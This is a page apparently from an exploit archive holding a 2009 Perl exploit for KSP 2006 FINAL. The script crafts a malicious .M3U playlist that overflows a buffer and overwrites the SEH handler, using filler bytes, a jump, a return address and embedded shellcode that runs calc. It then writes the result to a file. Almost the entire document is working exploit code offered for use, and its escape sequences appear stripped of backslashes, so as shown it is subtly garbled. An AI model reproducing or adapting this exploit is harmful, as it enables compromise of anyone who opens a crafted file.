[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : KSP 2006 FINAL ( .M3U) Universal Local Buffer Exploit (SEH)
# Published : 2009-08-24
# Author : hack4love
# Previous Title : Photodex ProShow Gold 4 (.psh File) Universal BOF Exploit XP SP3 (SEH)
# Next Title : FreeBSD <= 6.1 kqueue() NULL pointer Dereference Local Root Exploit
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# KSP 2006 FINAL ( .M3U) Universal Local Buffer Exploit (SEH)
# http://download.cnet.com/KSP/3000-2139_4-10540099.html?tag=mncol
# ## easy #### this work sooooooooo good############################
####################################################################
# USE>>KSP>>PLAYLIST>>LOAD>>HACK4LOVE.M3U>> >BOOM CALC
####################################################################
# INFO::WE HAVE ONLEY 192 BIT FOR shellcode SO I USE
## win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub
#####################################################################
###HAPEY _________RAMADAN############################################
#####################################################################
my $bof="x41" x 2385;
my $nsh="xEBx06x90x90";
my $seh="x38x01x6ex74";#### Universal
my $nop="x90" x 20;
my $sec=
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc2".
"xf8x23x02x83xebxfcxe2xf4x3ex10x67x02xc2xf8xa8x47".
"xfex73x5fx07xbaxf9xccx89x8dxe0xa8x5dxe2xf9xc8x4b".
"x49xccxa8x03x2cxc9xe3x9bx6ex7cxe3x76xc5x39xe9x0f".
"xc3x3axc8xf6xf9xacx07x06xb7x1dxa8x5dxe6xf9xc8x64".
"x49xf4x68x89x9dxe4x22xe9x49xe4xa8x03x29x71x7fx26".
"xc6x3bx12xc2xa6x73x63x32x47x38x5bx0ex49xb8x2fx89".
"xb2xe4x8ex89xaaxf0xc8x0bx49x78x93x02xc2xf8xa8x6a".
"xfexa7x12xf4xa2xaexaaxfax41x38x58x52xaax08xa9x06".
"x9dx90xbbxfcx48xf6x74xfdx25x9bx42x6exa1xf8x23x02";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> HACK4LOVE.M3U');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# www.Syue.com [2009-08-24]